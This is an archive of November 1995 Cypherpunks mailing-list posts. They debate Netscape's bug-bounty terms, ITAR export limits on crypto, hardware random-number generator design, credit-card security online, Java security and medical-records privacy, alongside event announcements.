  $10,000. The new challenge is similar: you must break WebSTAR's
  security to find information that's isn't available to the public
  and report it by midnight on 30-Nov-95. Check out the rest of the
  details online if you are interested. [ACE]

http://challenge.comvista.com/

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 15 Nov 1995 14:14:00 +0800
To: cypherpunks@toad.com
Subject: Secondary Ecash applications on hold
Message-ID: <v02120d03accf2ca386e5@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


A few weeks ago, I promised you all to write some scripts that will lay the
groundwork for some of the more unusual applications of Ecash.
Unfortunately, I went straight from one contract to the next and didn't
find the time to work on the scripts.

I am currently in St. Louis, making sure that Ecash makes the impact on
Internet commerce that many of us think it should make. Anyone on this list
that ever thought of opening a shop using Ecash or is interested in Ecash
in general is encouraged to email me at support@marktwain.com and share
their ideas.

TIA,


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 15 Nov 1995 18:29:34 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199511151019.CAA18910@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

I know that this is *painfully* dated, and I apologize to the list for
replying to a one month old post, but I felt I had to put some final items
on the record.  And I think that this is still timely ... so ... 


On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> Phil typed:
> > Have things really come to this?  Besides the legal implications of
> > discovering a hole and then selling the information to someone, (who
> > presumably will only want this information for one purpose) where has
> > the attitude of doing for the sake of doing gone?
>
> It's one thing to do good for the sake of doing good.  Most of us do that
> every day by participating in this list.  It's quite another thing to be
> insulted in the process.  I think that Netscape's reward is an insult,

Dr. Frederick B. Cohen has nailed it once again.  He's right. 

But Phil's comments really need to be addressed ... vis-a-vis the
implications of "discovering a hole and selling it".  Phil's hypothetical
is rightfully worrisome, but we should remember it _is_ only a
hypothetical. 

Let's not worry much about hypotheticals.  Perhaps we should worry more
about what in fact IS an ACTUAL, rather than what might possibly be. 

The hand-wringing should be over the existing reactions to publicly
ignored security holes and the ETHICS of the new Internet players.  

The ones who are so very cock-sure of themselves.  So cock-sure, that
they willingly gamble with public security and think that their invasion
of individuals personal boundaries and privacy is nothing noteworthy. 
That it will just somehow pass. 

My post detailing a structural flaw in Netscape Navigator was announced,
very quietly, to this list OVER ONE MONTH AGO.  And what has been done
about it, by AT&T and/or Netscape??  Nothing. 

AT&T has its reputation attached to this code, as does Deutsche Telecom,
as does Netscape.  The only "action" they've taken is to info-freeload and
then do absolutely, positively, definitely ... nothing. 

Diddly-squat.

No one has taken any action whatsoever.

How would we treat a company ... let's say a construction company that
found out that one of its buildings was unsafe, and then proceeded not to
barricade the complex.  If the company found out that the girders were not
up to the engineered spec, and simply allowed risk and harm to continue. 
If the Company thought it was OK to gamble with people's lives?  Would we
say that the reckless disregard for the public interest merited criminal
sanction?? 

Hopefully, we would.

To attack some hypothetical "information provider" for selling some
"hypothetical" information which a corporation denies is actually of any
value, at all -- nominal, or otherwise -- is an argument that just doesn't
float.  It completely misses the mark. 

> If they think you can find major security bugs in Netscape for as little
> as $1000, they should take the product off the market, or at least stop
> claiming that it offers security.

They should definitely take the product off the market.    

Period.  

They should also stop claiming that it offers any security.  In fact, they
should attach a product warning label, something that says that Netscape
Navigator degrades your inherent safety and security as soon as you use
it. 

That would be the "right thing" to do.  Because that is truthful.

AT&T's "brass" should have used the "Tylenol" or "Perrier" crisis
management model on this one.  Rather than, "The stick your head in the
sand like an ostrich" model.  Or the "Gee, maybe if I close my eyes, and 
pull the covers over my head, the boogie-man will go away" school. 

Someone has to call them on their collective jump into the World of
Management by Denial.

The issue here isn't the so-called "reward", the focus should rightly be
placed on who knew what and when they knew it, and what they did as a
consequence.  The issue is whether these Goliath Companies, happily roll
the dice when public safety and security is on the line. 

It's that simple.  A real no brainer.

> >  Has Netscape been pestering
> > security experts on the net for free work?  Have they been plaguing
> > people or lists with email asking the net to do their jobs?
>
> They do far worse.  They claim security when they don't have it, and
> when the cypherpunks demonstrate the false claims, Netscape offer
> insulting future tribute.  I think that if they are sincere, they should
> reward the individuals who found the last few holes with $25,000 each,
> and show that they really mean business.

Actually, they said that they want to "harness" the power of the internet,
and in return offered a chance to be enrolled in a contest for a mug or a
T-shirt, or maybe ... if they ... in "their sole discretion" thought
something was a security bug, then they'd offer a $1,000 award. 

Not *pestering* security experts, but simply asking them to sorta, kinda
take a look at the product.  Look, and help build the Companies' fortunes,
while the "Creative" talent might get a nice Netscape mug for their
troubles. 

This is what Netscape DID, but this isn't the true issue.

The true issue is a question of attitudes, not of monetary compensation. I
really don't care if Netscape or AT&T offer gold stars and nice little
pats on the head, or offer many "millions" or offer $25,000, or expect the
world's foremost security auditors to work for T-shirts or a bitta
Crackerjack. 

That's not the issue.

I just don't believe that any company should on the one hand represent
that they have a secure product -- that they actually care about security
 -- while on the other hand they take their black-box code and say that
anyone who brings an error to their attention -- a critical security flaw
 -- agrees implicitly to make the report the Company's property -- property
to be used at the Company's sole discretion. 

A security review audit is first and foremost for the benefit of the end
users.  The audit is not so that the company can use the information for
its own purposes.  The information is not there so that the company can
use a confidential auditor's report on security flaws to spy on their own
customers, and its certainly not there to enable a code cover-up.

Hell, these firms try to cover up even when the information is PUBLIC, let
alone when it's given to them in private.  And the crying and whining is 
unbecoming, because the attempt at private communication was made.

It was made with both Netscape, and with AT&T.

> > The ironic part is the people who have been the most successful at
> > finding bugs are not the ones who are demanding money for it!
>

You're right.  the people who find the bugs simply ask that the public
interest be served ... that the Network's interest be served, and that the
National interest be served. 

Defective product serves no one, and adding an object to an existing
computing environment under the rubric of an experimental data type serves
no-one.  Correction, it serves no-one except those who would rather see
harm come to the public. Those who value and place their own self-interest
above that of others. 

And the consequnces be damned.

> The ironic part is that a company that claims to have a "secure" method
> for using credit cards on the Internet thinks that their security is so
> weak that it only takes $1000 to find a major hole.

The ironic part is that even once a critical design flaw is identified, no
action is taken by anyone -- even when the person who finds it demands no
money whatsoever for it -- the real irony is that the press is silent, and
so is the company. 

See no evil, speak no evil, hear no evil.

Let the harm and damage continue ... by my calculation, it's been one
month already ... shall we maybe try now for two?? 

I don't think so. 

> --
> -> See: Info-Sec Heaven at URL http://all.net
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Thu, 16 Nov 1995 06:04:18 +0800
To: cypherpunks@toad.com
Subject: encryption in BeOS kernel
Message-ID: <199511150526.FAA12374@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


This also corresponds to IBM's development of its "IPC"
"network appliance" (also due out 1Q '96) to challenge
the desktop PC for Internet use.

It parallels as well IBM's reported work on a "Microkernal"
which may feature encryption, authentication and security
hooks.

IBM's IPC will probably use an Intel chip (WSJ today).

Which leads to speculation:

Would chip-fabbers covertly Fortezza chips to get export ok?

Motorola, HP, IBM, others long-linked to USG are ever ready 
to gobble international market share in the national
interest.

Intel, sure, world-class fab plants planting chip-secrets.

Wonder if that key escrow protest to Gore is a cover for
economic actions authorized by National Security D&D?












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 15 Nov 1995 21:04:43 +0800
To: pc@pdj2-ra.F-REMOTE.CWRU.Edu
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.3.89.9511140929.A25609-0100000@tesla.cc.uottawa.ca>
Message-ID: <9511151255.AA26027@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


:    It kind of sickens us that we had to do it, but so be it. 
:    
:    Patches that re-implement the PEM code may be available at a foreign
:    site soon. If it does show up, we'll point to it - that can't be
:    illegal! 

I see no reason why they should not be as ``illegal'' as the
crypto-with-a-hole sillyness.  Pointing to software is a pretty
effective way of disclosing it, and disclosing cryptographic
software--apparently including holes--to foreign persons without a
license is a violation of the ITAR.

Of course, the ITAR itself is illegal as it applies to cryptographic
software, but I agree that one does not want to be the defendant in a
criminal case based on those unconstitutional provisions.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 15 Nov 1995 22:26:10 +0800
To: cypherpunks@toad.com
Subject: MED_vac
Message-ID: <199511151416.JAA13881@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-15-95. NYPaper Page One:


   "When Patients' Records Are Commodities for Sale."

      Individual medical records, carrying more sensitive
      personal information than ever before, are increasingly
      being gathered and stored by the tens of thousands in
      commercial databanks maintained by institutions like
      hospital networks, health maintenance organizations and
      drug companies. And although there is a Federal law that
      protects the privacy of video rental lists, private
      medical information is being bought and sold freely.

      The issue of medical privacy touches virtually everyone.
      "It is true to say that if you know a person's history
      of health problems, then you know more about that person
      than you would with any other data," said Lawrence O.
      Gostin, a professor at Georgetown University Law Center.
      And as medical records start including new genetic
      information that can predict diseases likely to show up
      in years to come, they will be able to reveal "not just
      health histories, but health futures," Mr. Gostin said.

      Yesterday hearings were held on a bill called the
      Medical Records Confidentiality Act, intended to
      establish uniform Federal rules for the use and
      disclosure of health information.

      Although the bill details procedures for obtaining
      consent, it also establishes a formidable list of
      exceptions to this requirement. The police, health
      oversight agencies, health information services, public
      health offices and medical researchers are among those
      allowed to obtain records of an identified patient
      without that person's consent and, in many cases without
      notification.


   MED_vac  (15 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 16 Nov 1995 03:22:50 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Hardware-random-bits interface
Message-ID: <199511151519.JAA12151@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:31 PM 11/14/95 -0800, you wrote:
>I've been thinking about physically random bits recently, so
>I'd like to offer a simple, easily implementable interface to a
>source of such bits, along with a design sketch using a common
>radio receiver chip as the noise source.

It sounds like a fairly decent idea, _as long as you shield the bejeebers
(technical term :-) out of it_. Otherwise, anybody with a signal generator
could skew your numbers however they saw fit: any component lead can act as
an antenna, no matter now small that lead is.

One way to handle it would be to lay it out as a multi-layer PCB, with the
signal & power traces inside, and ground plane on the outer layers. Then
enclose the circuit components inside a shielding enclosure (mu-metal would
be good) mounted to the PCB, then tuck the entire assembly inside another
enclosure (small aluminum box for example, also connected to ground).

Of course, there would be easier ways to fabricate it, but they would just
make the shielding that much more difficult to implement.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 15 Nov 1995 23:54:17 +0800
To: cypherpunks@toad.com
Subject: RSA T-shirt
Message-ID: <199511151531.JAA12350@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


FWIW, I finally got a chance to see if my barcoded RSA-in-perl t-shirt would
actually scan - and it did! It took a bit of fiddling, but it was scannable
using one of those hand-held CCD barcode readers.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Melman <melman@osf.org>
Date: Wed, 15 Nov 1995 23:01:56 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511150156.RAA18623@netcom21.netcom.com>
Message-ID: <9511151447.AA10433@absolut.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue Nov 14, 1995, Vladimir Z. Nuri wrote:

> attempts to get secure credit card number transfer on the
> internet are not an end in themselves. they are the first
> steps toward an entirely new transaction system. those who
> see a single step and criticize it as feeble in the
> context of past systems are missing the point and
> apparently can't think past the present nanosecond of
> their lives.

You'll have a hard convincing folks that they need something
better than what works perfectly well today.

Here's another point that I didn't see in your list.  Today
it might be just as safe to send your CC# over the internet
as giving it to a clerk, etc.  This is mostly because the
number of CC#'s sent over the net vs the whole traffic is
small.  It is therefore not very cost effective to try to
steal credit card numbers over the net vs other means
(searching through dumpsters, taping a phone line near LL
Bean, etc.).  If CC# purchases became common over the net,
it would become much more valuable to try to steal them from
the net and more people would.  It would then become much
less secure, not for any technical reason but because there
will be more crooks exploiting the existing flaws.

Where is it most common to steal cellular phone id's (I'm
not sure what they are called, but the id's sent that
someone can steal to build a forged cell phone)?  At
airports.  Why?  Because more cell phones are used there,
everyone uses one as they get on or off a plane.  If you
want to troll for id's, go to where there are many.

Howard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 15 Nov 1995 23:26:44 +0800
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9511151215.AA20714@all.net>
Message-ID: <199511151510.KAA23996@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



> 
> On a closely related vein, Sun has announced that they are severely
> limiting some functions in HotJava - from Risks-17-45:

   The problems found however, were not fundamental flaws in
the Java language itself nor in the Java virtual machine. As
I've said many times, you can pretty much rip any i/o capability
out of Java by changing the runtime class libraries. If someone
finds as way to to defeat the Java bytecode verifier/class loader
and replace a class in java.* with a more powerful one, then that
will be really significant.

> I had a rather lengthy discussion with a gentleman from Sun at the CSI
> conference last Tuesday night, and this announcement follows many of the
> things we discussed very closely.  This kind of consistency between what
> people say and what the company published is refreshing, and it restores
> my faith in Sun's desire to do things well.  Of course there are still
> some problems left unresolved:

[denial of service problems deleted. ]
> 
> Similarly, if your HotJava allows an insecure Postscript implementation
> to interpret postscript files, you're still beat.

   This is not a flaw or a feature. If you download a helper
app off the internet that has a flaw, it's not a flaw in the 
browser. Claiming that it is is like claiming that
"ftp"  or "nfs" has a fatal flaw because it allows you execute
untrusted binaries from other computers. Helper apps are in
the category of third party add-ons and the responsibility for
their correct implementation rests on the companies which sell them.
Netscape never claimed the ability to allow users to download
executable binary applications from the net and run them without
risk. Netscape doesn't come with a postscript interpreter nor does
it have one configured by default, so if the user installs one
and configures it, and it has a security flaw, it's not Netscape's
fault. Installing helper apps is not "easy" compared with
clicking on a Java applet so any user who does it must atleast be 
somewhat knowledgable.

   If a postscript interpreter is implemented in JDK Beta, and
it is insecure and it is allowed to interpret postscript files,
nothing bad will happen.

> I do think that this response by Sun, regardless of the technical merits
> of the particulars, demonstrates a desire to improve protection and a
> willingness to listen.  My compliments for that.

   They've never demonstrated otherwise in my entire history on the Java
mailing lists. Their whole mission is to produce a secure environment
for executing untrusted applications. The alpha's and beta's  of
every product have problems, it's to be expected. The whole point
of releasing a beta is so that you can get feedback.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Wed, 15 Nov 1995 17:45:57 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto requlations & laws
Message-ID: <MAILQUEUE-101.951115103109.320@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Could the person posting the location of the crypto laws please repost.
http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Bert-Jaap Koops




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 16 Nov 1995 03:15:15 +0800
To: cypherpunks@toad.com
Subject: Re: Hardware-random-bits interface
Message-ID: <accf76ef010210049425@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:17 PM 11/15/95, David K. Merriman wrote:
>At 02:31 PM 11/14/95 -0800, you wrote:
>>I've been thinking about physically random bits recently, so
>>I'd like to offer a simple, easily implementable interface to a
>>source of such bits, along with a design sketch using a common
>>radio receiver chip as the noise source.
>
>It sounds like a fairly decent idea, _as long as you shield the bejeebers
>(technical term :-) out of it_. Otherwise, anybody with a signal generator
>could skew your numbers however they saw fit: any component lead can act as
>an antenna, no matter now small that lead is.

But if you "shield the bejeebers out of it," then all the radio receiver
generates is whatever signal manages to sneak through--which, ironically,
would make it _easier_ for an outside attacker to drive--and some amount of
internal receiver/amplifier noise, such as the Johnson noise talked about
here. (Every receiver has an "equivalent noise temperature," recall.)

And if one is left with only internal noise, why not simply use a nice
clean source like a Zener diode?


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 16 Nov 1995 01:53:41 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: credit card conventional wisdom
In-Reply-To: <199511150512.VAA08514@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.90.951115111136.26369B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Obiously you never jumped in the garbage bin of a restorant looking for cc's.
Yeah give it to one person... sure.....

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 14 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> Actually, this is not quite correct.  There is a difference if I give a
> credit card to *one* person, or if I give the message containing that
> number to a chain of twenty or thirty strangers to get my information to
> the one person I want to have that information. 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Thu, 16 Nov 1995 03:12:24 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Hardware-random-bits interface
Message-ID: <m0tFmLF-000912C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>I've been thinking about physically random bits recently, so
>I'd like to offer a simple, easily implementable interface to a
>source of such bits, along with a design sketch using a common
>radio receiver chip as the noise source.  The interface consists
>of two bits in the standard PC parallel port, one serving as
>the data line and the other the sampling clock.
[stuff deleted]

>  Device probing:  the device should somehow identify itself
>    as a random bit generator.  One way to do this is to wire
>    one of the parallel port data bits to a status line; for
>    example, data bit 0 (pin 2) could be wired to status bit 5
>    (pin 12).  Software can then twiddle the data bit and
>    watch for the response.

I'm not a crypto expert, or a mathematician, or anything like that, but I
think I have a few suggestions that you should consider.

1.  DON'T let the random-number generator "know" that it is being accessed,
even with something as simple as a clock.  The reason is that if it became
important enough, an agency with a BIG BUDGET could make a custom chip that
implemented the same apparently-random function, (but might really be a
10**18 state machine with, say, only 10**6 starting positions) but could be
"alerted" and reset by a specific pattern of external accesses, possibly
activated by a special-purpose virus.

The resulting "fake" chip would appear to result in random output, if never
reset, but would produce a data stream with a predictable series with a
limited number of starting points.

2.  Since the main goal of the project is to have this end up being an
ECONOMICAL board, you'll probably end up with a data stream which has some
sort of slight bias in one direction or another.  As far as I can see,
that's okay, because it merely means that you're getting somewhat less than
one bit of randomness with each accessed bit.  But as I understand it, the
solution to this is to combine the bits in software so that you end up with
fewer bits.  While it's been months since I've read Schneier's book, I
recall that it talked about extracting more-perfectly-randomized bits from a
larger collection of not-quite-so-randomized ones.

3.  In addition, for most trustworthy results, I think you should XOR the
resulting data with a long-period pseudorandom stream of bits derived and
modified from some reasonably random inputs, such as keystroke timings and
free-running-system-clock bits.  The reason is that (as far as this neophyte
knows)  a stream of GOOD randomized numbers XOR'ed with a stream of
reasonably randomized numbers results in a stream at least as randomized as
the better source.  More importantly, such a procedure should help deter any
attempt to corrupt the physically-random source, because even going to that
trouble of subverting it they'd only defeat only one stage in the process.

4.  I think the user should be given the option of socketing the IC's.
True, that would make it easier for an interloper to replace, but it would
also allow the user to quickly swap the critical chips, possibly at
intervals of a few days to a few weeks, to partially guard against sabotage.

5.  The whole assemblage should be able to be stored in a package sealed
with evidence tape.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 16 Nov 1995 03:45:37 +0800
To: Arley Carter <ac@hawk.twinds.com>
Subject: Re: credit card conventional wisdom
In-Reply-To: <Pine.HPP.3.91.951115112428.20058C-100000@hawk.twinds.com>
Message-ID: <199511151924.LAA29261@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Arley Carter <ac@hawk.twinds.com>

>This may be a stupidly obvious question but..... 
>We could argue until the cows come home, hell freezes over or the Cubs win
>the World Series, what ever comes first ;-) about whether giving your credit
>card number to a waiter or an 800 # clerk is any more or less secure than
>transmitting it encrypted or clear text over a data link.
>

the point of my post was that I AGREE. the only issue is that we should
make internet security as superior as possible regardless of the security
of credit cards in the real world. I was attacking the line of thought
that goes, "credit card security is already marginal, therefore why 
should anyone try to improve it in cyberspace"? this is circular
reasoning. "why should anyone try to make something more secure when
it is already insecure?"

>
>I have seen no such statement from the Visa/MasterCard/bank consortiums
>regarding who is at risk if my card number is stolen and used in cyberspace.
>When I get a written indemnification from them stating clearly that 
>using my credit card in cyberspace is no different from using in a local
>restaurant, then I see no risk to the user in using the card in cyberspace.

a major point of my post was that even if you think the cost of fraud
is invisible to you, it is not. it is in everyone's interest to reduce
fraud. if you think you are not paying for it now, your are believing
in an illusion. reducing fraud rates will decrease costs for everyone
in the long run. it is true that credit card companies try to localize
the costs to the areas where their risk is higher (for example, higher
interest rates on credit risks, different charges to the merchant
for "card present" vs. "card not present" as indicated by the other 
poster), however I still think it is obvious that these costs are
still distributed over all customers.

this is one of the main illusions I was trying to discredit in my
original post. the thinking goes like this: "so-and-so does not
appear to have any affect on me now, therefore to consider it is
irrelevant." in the case of credit card users, they seem to think,
"I can already cancel any transactions. illicit purchases made when
somebody steals my card in cyberspace are no different". another
line of thinking is, "credit cards are already insecure, so who
cares if people steal them over the internet". all of these are
very specious lines of thought. your own line is, familiarly,
"nothing matters unless it shows up on my own credit card bill" is
again in my opinion an invitation to disaster. you are paying for
the insecurity of credit cards right now, if not to your credit
card company than in slightly increased rates in the goods you buy
(to cover the merchant's cost to the credit card company).

>The risk to the bank and merchant.......Now that is a different matter.
>Credit card usage on the net will never take off until this issue is
>solved to the satisfaction of the bank and the user.  Until this happens
>arguing this issue is like arguing about how many angels can fit on the 
>head of a pin.

part of getting to the point of satisfaction of the bank and user is
improved internet security. another point of my post.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Thu, 16 Nov 1995 04:16:53 +0800
To: cypherpunks@toad.com
Subject: Re: Hardware-random-bits interface
In-Reply-To: <199511151905.OAA08439@jekyll.piermont.com>
Message-ID: <199511152003.MAA03762@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> > And if one is left with only internal noise, why not simply use a nice
> > clean source like a Zener diode?
> 
> Quite solidly agreed. Internal noise beats external noise, and there
> is no point in using a radio receiver when what you want is internal
> noise.

It may have been misleading to refer to a radio receiver chip:  the
noise generated by the chip will be entirely internal.  It doesn't
depend on any external signal "sneaking in"; the noise comes from
the effective resistance of the first amplifier stage.  Nothing
is being "received", in some sense; it's just a big hunk 'o gain.

A Zener diode would be fine, but the design is a bit more complex,
especially for wide bandwidths---you need to mess with biasing
voltages, speedy op-amps, interface to CMOS, and all that jazz.
You'd need external power (or a DC-DC converter).  I wanted a
super-simple design that people could just plonk down on a PC
board.  Two chips and some bypass capacitors.

Peter





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 17 Nov 1995 16:03:02 +0800
To: cypherpunks@toad.com
Subject: e$: Financial Cryptography for Dogs, pt. 2.  OpenDoc Kitchen, anyone?
Message-ID: <v02120d03accfcdbea466@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




As a result of my temporary notoriety as OpenDoc Futurist(tm) ;-), I've
heard about something called an OpenDoc Kitchen, which is a periodic hack
fest put on by Apple for developers of OpenDoc parts where code is actually
written.

My understanding is that this will be held at Apple, in Cupertino, in early
December.

They are especially interested in anyone from Digicash who would like to
make a digital cash OpenDoc component for Cyberdog, because I've been
ranting to them about this picture in my head of someone dragging digital
cash icons onto a register icon in a web browser to pay for a purchase.  I
expect that *any* digital cash part, even some kind of bashing of the
current Mac ecash client into an OpenDoc part, would be cool by them as a
first start.

In addition, it seems to me that we may be close enough with MacPGP 3.0 to
play with it at the component level, but maybe not...


If you're interested, e-mail me, and I'll put you in touch with the right
people.  Now, the invitations have already been sent and RSVP'd on this, so
we'd be coming in through the back door. Obviously, we're looking to put
the best foot forward, as they are just about to the point of believing my
mantra of "digital commerce *is* financial cryptography".

I'm hoping to go, if there's something to do. I couldn't code my way out of
a paper bag, but like the immortal Chauncey Gardener, "I like to watch."
;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 02:15:22 +0800
To: cypherpunks@toad.com
Subject: DCSB: "A Middleware Guy Looks at Issues in Digital Commerce"
Message-ID: <v02120d08accfd5a980c7@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                               Rich Salz
                        Open Software Foundation

           "A Middleware Guy Looks at Issues in Digital Commerce"


                        Tuesday, December 5, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Rich has been with OSF for nearly four years, where he has been
the technical lead of the OSF DCE 1.1 and 1.2 releases.  He is
also helping write the secure multi-threaded WWW server for the
DCE-Web project.  He has been active in Usenet, and is the author
of INN, one of the most popular Usenet/NNTP implementations.
His home page is http://www.osf.org/~rsalz.

Rich says:

>In the rush to separate lift even more money out of your wallet
>-- sorry, to provide consumers with more choice and opportunity
>-- the electronic commerce community has largely been ignoring
>issues that the distributed systems field has been trying to
>address for years.


This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, December 5, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by Saturday,
December 2 (that's two weeks from this Saturday), or you won't be on the list
for lunch. Checks payable to anyone else but The Harvard Club of Boston will
have to be sent back.

Checks should be sent to Robert Hettinga, c/o The Shipwright Development
Corporation, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they
must be made payable to "The Harvard Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with a few glacial A/P departments ourselves, for instance), please
let us know via e-mail, and we'll see if we can work something out.


January's speaker will be Art Hutchinson of Northeast Consulting Resources,
Inc.

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the BSDC Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Boston Society for Digital Commerce, send
"info bsdc" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the BSDC e-mail list, send "subscribe bsdc" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Bob Hettinga
Moderator,
The Digital Commerce Society of Boston


